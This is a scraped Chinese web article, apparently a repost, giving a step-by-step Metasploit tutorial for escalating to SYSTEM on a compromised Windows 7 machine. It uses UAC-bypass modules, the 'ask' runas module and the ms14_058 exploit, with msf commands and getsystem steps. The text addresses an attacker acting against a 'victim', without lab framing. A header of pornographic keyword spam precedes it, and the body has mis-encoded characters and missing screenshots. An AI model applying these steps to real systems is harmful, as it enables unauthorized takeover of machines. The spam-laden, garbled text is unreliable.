日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

[[178618]]

前言

當你在愛害者的機器上執(zhí)行一些操作時，發(fā)現有一些操作被拒絕執(zhí)行，為了獲得受害機器的完全權限，你需要繞過限制，獲取本來沒有的一些權限，這些權限可以用來刪除文件，查看私有信息，或者安裝特殊程序，比如病毒。Metasploit有很多種后滲透方法，可以用于對目標機器的權限繞過，最終獲取到系統(tǒng)權限。

環(huán)境要求：

1.攻擊機：kali linux

2.目標機：Win 7

在已經獲取到一個meterpreter shell后，假如session為1，且權限不是系統(tǒng)權限的前提下，使用以下列出的幾種提權方法：

一、繞過UAC進行提權

本方法主要有以下3個模塊。

上面這些模塊的詳細信息在metasploit里已有介紹，這里不再多說，主要說一下使用方法。以exploit/windows/local/bypassuac模塊為例

該模塊在windows 32位和64位下都有效。

 
 
 
 

  
  
  
  
msf > use exploit/windows/local/bypassuac 
  
  
  
  
msf exploit(bypassuac) > set session 1 
  
  
  
  
msf exploit(bypassuac) > exploit 
 
 
 
 

本模塊執(zhí)行成功后將會返回一個新的meterpreter shell，如下

模塊執(zhí)行成功后，執(zhí)行getuid發(fā)現還是普通權限，不要失望，繼續(xù)執(zhí)行getsystem，再次查看權限，成功繞過UAC，且已經是系統(tǒng)權限了。

其他兩個模塊用法和上面一樣，原理有所不同，執(zhí)行成功后都會返回一個新的meterpreter shell，且都需要執(zhí)行getsystem獲取系統(tǒng)權限。如下圖：

 
 
 
 

  
  
  
  
exploit/windows/local/bypassuac_injection 
 
 
 
 

 
 
 
 

  
  
  
  
exploit/windows/local/bypassuac_vbs 
 
 
 
 

二、提高程序運行級別(runas)

這種方法可以利用exploit/windows/local/ask模塊，但是該模塊實際上只是以高權限重啟一個返回式shellcode,并沒有繞過UAC，會觸發(fā)系統(tǒng)UAC，受害機器有提示，提示用戶是否要運行，如果用戶選擇“yes”，就可以程序返回一個高權限meterpreter shell(需要執(zhí)行getsystem)。如下：

在受害機器上會彈出UAC，提示用戶是否運行。如下：

三、利用windows提權漏洞進行提權

可以利用metasploit下已有的提權漏洞，如ms13_053,ms14_058,ms16_016,ms16_032等。下面以ms14_058為例。

 
 
 
 

  
  
  
  
msf > exploit/windows/local/ms14_058_track_popup_menu 
  
  
  
  
msf exploit(ms14_058_track_popup_menu) > set session 1 
  
  
  
  
msf exploit(ms14_058_track_popup_menu) > exploit 
 
 
 
 

用windows提權漏洞提權時，會直接返回高權限meterpreter shell，不需要再執(zhí)行getsystem命令。

需要說明的是：在實際測試時，如果出現目標機器確實有漏洞，但是提權沒有成功時，請確認你的TARGET和PAYLOAD是否設置正確，64位的系統(tǒng)最好用64位的PAYLOAD。

本文標題：metasploit下Windows的多種提權方法
URL鏈接：http://www.5511xx.com/article/dhjhoei.html